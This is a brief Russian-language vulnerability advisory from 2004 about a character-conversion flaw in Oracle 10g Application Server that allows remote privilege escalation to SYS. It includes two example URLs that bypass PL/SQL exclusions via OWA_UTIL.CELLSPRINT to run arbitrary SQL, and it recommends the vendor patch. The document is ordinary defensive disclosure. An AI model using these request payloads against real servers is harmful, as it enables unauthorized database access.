Обход ограничений в Oracle 10g/AS
- Дата публикации:
- 24.12.2004
- Всего просмотров:
- 1024
- Опасность:
- Высокая
- Наличие исправления:
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Воздействие:
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
Уязвимые версии: Oracle 10g AS
Описание:
Обнаружена уязвимость в Oracle 10g/AS. Удаленный атакующий может повысить свои привилегии на системе.
Уязвимость существует из-за ошибки при конвертации символов. Удаленный атакующий может обойти pl/sql исключения и получить доступ к серверу баз данных от имени SYS. Примеры:
http://server/pls/windad/S%FFS.OWA_UTIL.CELLSPRINT?P_THEQUERY=select+username+from+all_users
http://server/pls/windad/S%9FS.OWA_UTIL.CELLSPRINT?P_THEQUERY=select+username+from+all_users
URL производителя: oracle.com
Решение: Установите обновление с сайта :
http://metalink.oracle.com
Ссылки:
Oracle 10g/AS on all operating systems